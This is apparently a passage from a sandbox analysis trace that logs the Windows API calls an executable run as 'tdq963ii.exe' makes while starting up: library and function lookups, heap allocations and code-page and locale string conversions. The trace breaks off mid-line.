[0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0206.284] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0206.284] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0206.285] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0206.286] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0206.286] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0206.286] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0206.286] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0206.286] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0206.286] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0206.286] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0206.286] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0206.287] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0206.287] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0206.287] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0206.287] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0206.287] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0206.287] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0206.287] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0206.287] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0206.288] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0206.288] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0206.288] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0206.288] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0206.289] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0206.289] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0206.513] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0206.669] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x33eda340, dwHighDateTime=0x1d68287)) [0206.669] GetCurrentThreadId () returned 0x40c [0206.669] GetCurrentProcessId () returned 0x8ac [0206.669] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=32700780783) returned 1 [0206.675] GetProcessHeap () returned 0x5a0000 [0206.925] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0206.925] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0206.926] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0206.927] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0206.928] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0206.929] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0206.930] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0206.930] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0207.007] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3bc) returned 0x5b60d0 [0207.007] GetCurrentThreadId () returned 0x40c [0207.007] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b6498 [0207.007] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5b64b8 [0207.007] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xaf257d33, hStdError=0x0)) [0207.007] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0207.007] GetFileType (hFile=0x3) returned 0x2 [0207.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0207.008] GetFileType (hFile=0x80) returned 0x3 [0207.008] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0207.008] GetFileType (hFile=0xb) returned 0x2 [0207.009] GetCommandLineW () returned="tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner" [0207.009] GetEnvironmentStringsW () returned 0x5b6cc0* [0207.009] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb86) returned 0x5b7850 [0207.012] FreeEnvironmentStringsW (penv=0x5b6cc0) returned 1 [0207.012] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0207.013] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x7a) returned 0x5b6cc0 [0207.015] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa0) returned 0x5b6d48 [0207.015] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5b83f8 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6c) returned 0x5b6df0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6e) returned 0x5b6e68 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x78) returned 0x5af8f0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x62) returned 0x5b6ee0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b6f50 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5b6f88 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5b6fd8 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x28) returned 0x5b7010 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1a) returned 0x5b5aa0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4a) returned 0x5b7040 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x72) returned 0x5af970 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b7098 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b70d0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1c) returned 0x5b5ac8 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd2) returned 0x5b7108 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x7c) returned 0x5b71e8 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x36) returned 0x5b7270 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3a) returned 0x5b8440 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x90) returned 0x5b72b0 [0207.128] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b7348 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b7378 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x36) returned 0x5b73b0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5b73f0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x52) returned 0x5b7440 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b8488 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b74a0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x82) returned 0x5b74c0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b7550 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5b5af0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2c) returned 0x5b7588 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x54) returned 0x5b75c0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x52) returned 0x5b7620 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5b7680 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b84d0 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x54) returned 0x5b76b8 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b7718 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x5b7748 [0207.129] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x8c) returned 0x5b7780 [0207.129] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b7850 | out: hHeap=0x5a0000) returned 1 [0207.160] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5b7818 [0207.160] GetLastError () returned 0x0 [0207.160] SetLastError (dwErrCode=0x0) [0207.160] GetLastError () returned 0x0 [0207.160] SetLastError (dwErrCode=0x0) [0207.160] GetLastError () returned 0x0 [0207.160] SetLastError (dwErrCode=0x0) [0207.160] GetACP () returned 0x4e4 [0207.161] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5b8020 [0207.161] GetLastError () returned 0x0 [0207.161] SetLastError (dwErrCode=0x0) [0207.161] IsValidCodePage (CodePage=0x4e4) returned 1 [0207.161] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0207.161] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0207.163] GetLastError () returned 0x0 [0207.163] SetLastError (dwErrCode=0x0) [0207.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0207.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0207.216] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0207.216] GetLastError () returned 0x0 [0207.216] SetLastError (dwErrCode=0x0) [0207.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0207.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0207.216] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0207.216] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0207.216] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ£|%¯äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0207.216] GetLastError () returned 0x0 [0207.216] SetLastError (dwErrCode=0x0) [0207.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0207.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0207.217] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0207.217] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 